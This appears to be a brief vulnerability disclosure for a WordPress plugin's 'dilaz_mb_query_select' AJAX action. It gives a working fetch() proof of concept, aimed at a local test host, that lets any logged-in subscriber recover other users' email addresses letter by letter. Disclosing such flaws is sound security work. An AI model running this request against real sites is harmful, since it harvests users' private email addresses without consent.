The plugin allows any logged in user, such as subscriber, to extract any other user’s email address.
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": "@gma", "query_type": "user"}),
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
If a given user name appeared in the output list, that means, the user has "@gma" in their e-mail. Then you can extract any user's e-mail letter-by-letter.